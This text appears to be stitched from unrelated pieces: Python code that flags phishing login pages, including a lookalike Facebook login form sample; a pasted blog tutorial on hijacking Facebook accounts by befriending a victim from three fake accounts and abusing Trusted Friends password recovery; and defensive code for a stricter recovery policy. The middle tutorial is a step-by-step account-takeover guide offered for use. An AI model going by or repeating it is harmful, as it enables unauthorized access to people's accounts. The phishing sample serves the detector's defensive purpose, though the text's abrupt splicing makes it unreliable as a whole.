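LOOKALIKE = ('<title>Facebook - Log In</title><form action="login.php" method="post">'
             '<input name="email"><input type="password" name="pass"></form>')
GENUINE = ('<title>Facebook - Log In</title><form action="/login/" method="post">'
           '<input name="email"><input type="password" name="pass"></form>')

def on_brand_host(host):
    """True if host is a brand domain or a subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BRAND_HOSTS)

class FormScan(HTMLParser):
    """Collects each form's action and whether it holds a password field."""
    def __init__(self):
        super().__init__()
        self.forms, self.text = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append([a.get("action") or "", False])
        elif tag == "input" and self.forms and (a.get("type") or "").lower() == "password":
            self.forms[-1][1] = True

    def handle_data(self, data):
        self.text.append(data.lower())

def assess_page(page_url, html):
    """Return findings for a fetched page; an empty list means nothing flagged."""
    scan = FormScan()
    scan.feed(html)
    page_host = urlparse(page_url).hostname
    mentions_brand = any(w in " ".join(scan.text) for w in BRAND_WORDS)
    findings = []
    # Only forms that contain a password field are of interest.
    for action in (a for a, has_password in scan.forms if has_password):
        target_host = urlparse(urljoin(page_url, action)).hostname
        if mentions_brand and not on_brand_host(page_host):
            findings.append(f"brand login form served from {page_host}")
        if not on_brand_host(target_host):
            findings.append(f"password posted to {target_host}")
    return findings
```

A mail gateway or proxy can run a check like this on pages behind links in inbound messages; the redirect to the real site after submission is why users rarely notice, so the flag has to be raised before the form is filled in.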
- Using 3 Fake Friends Method :-
by Chris Defaulter Valentine, in Labels: #op Facebook Hacking
"Hack Facebook Account" is the most popular term on the Web. Previously I posted many articles on "Hack Facebook Accounts" with keyloggers, phishing, etc., but those Hacking Of Facebook Account methods are not working fine nowadays. So hackers have to go smarter, and we have found a new security hole (it's just a trick) in FB. So we can Hack Facebook easily. Now we can hack Facebook online with the help of the new password recovery feature of FB. So keep on reading about this new way for Hacking Of Facebook Account. FB recently released a new way to recover the account password using "Three Trusted Friends".
If we forget the Facebook account password then FB will send a unique security code to three friends. Then we have to ask each of the three friends for that security code. And after giving those codes to FB we can recover the Facebook password. So here we are going to misuse this new feature of FB to Hack Facebook Account. We just have to create 3 fake FB accounts and then send a friend request from those 3 fake accounts to the victim. The victim must accept those friend requests. Now we can use the above "Three Trusted Friends" feature to reset the victim's Facebook account password. I have given a full guide on How To Hack Facebook Accounts.
Note - The 3 fake accounts must be 7 days old, otherwise this Facebook Hack will not work. So let's start on our tutorial on Hack Facebook Account.
1. Go to Facebook.com and click on Forgot Password.
2. Now give the victim's Facebook account email, or the FB username or profile name, and click on search. You will then get the victim's profile account. Just click on "This is my Account".
3. Then click on "No longer have access to this".
4. Now you will be asked to enter a new email address; just enter your own new email address.
5. Now Facebook will ask you to give the security question's answer. Not to worry, just enter a wrong answer thrice and you will be taken to the new page.
6. Here is the main part of Hacking Of Facebook Account. Click on Continue and FB will ask you to select 3 Trusted Friends. There will be a full friends list of the victim, which also includes your previously created "Three Fake Facebook Accounts". Just select those three accounts and then Facebook will send security codes to our fake accounts. Now collect those security codes and enter them. Then Facebook will send a "Password Recovery Email" to the email address we entered in the 4th step. Thus you can easily reset the password of the victim's account.
Now we have successfully done with Hack Facebook Accounts
Note : We have received reports of problems where people don't get the new page in step 5. This depends on the victim's activity on the Facebook account.
So friends, I hope you enjoyed this article on Hack Facebook Accounts, and if you have any problem with this Hack Facebook Account Free then please do comment.
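The steps above work only because the person requesting recovery chooses the code recipients from the full friends list, and because very young friendships qualify. The sketch below is an added example of a recovery policy that closes both gaps; it is not Facebook's implementation, and the thresholds, class and function names are hypothetical.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Hypothetical thresholds for this example; not Facebook's actual values.
MIN_FRIENDSHIP_AGE = timedelta(days=180)
MIN_CONTACT_ACCOUNT_AGE = timedelta(days=365)
CLUSTER_WINDOW = timedelta(days=14)

@dataclass
class Friend:
    name: str
    account_created: datetime
    friends_since: datetime
    designated_by_owner: bool  # chosen earlier by the owner while logged in

def eligible_contacts(friends, now):
    """Friends who may receive a recovery code; the requester never picks from the full list."""
    return [f for f in friends
            if f.designated_by_owner
            and now - f.friends_since >= MIN_FRIENDSHIP_AGE
            and now - f.account_created >= MIN_CONTACT_ACCOUNT_AGE]

def recovery_decision(friends, chosen_names, now):
    """Return (allowed, reason) for a trusted-contact recovery request."""
    ok = {f.name: f for f in eligible_contacts(friends, now)}
    chosen = [ok.get(n) for n in chosen_names]
    if len(set(chosen_names)) < 3 or None in chosen:
        return False, "needs three distinct eligible contacts"
    added = sorted(f.friends_since for f in chosen)
    # Heuristic: three contacts befriended within days of each other look coordinated.
    if added[-1] - added[0] <= CLUSTER_WINDOW:
        return False, "contacts were all befriended in one short window"
    return True, "send codes and notify the owner on existing channels"

def constructed_friends(now):
    """Constructed sample: three recently added accounts and three long-standing friends."""
    recent = [Friend(f"new{i}", now - timedelta(days=10), now - timedelta(days=8), False)
              for i in range(3)]
    old = [Friend(n, datetime(2012, 1, 1), datetime(y, 5, 1), True)
           for n, y in (("a", 2016), ("b", 2018), ("c", 2020))]
    return recent + old
```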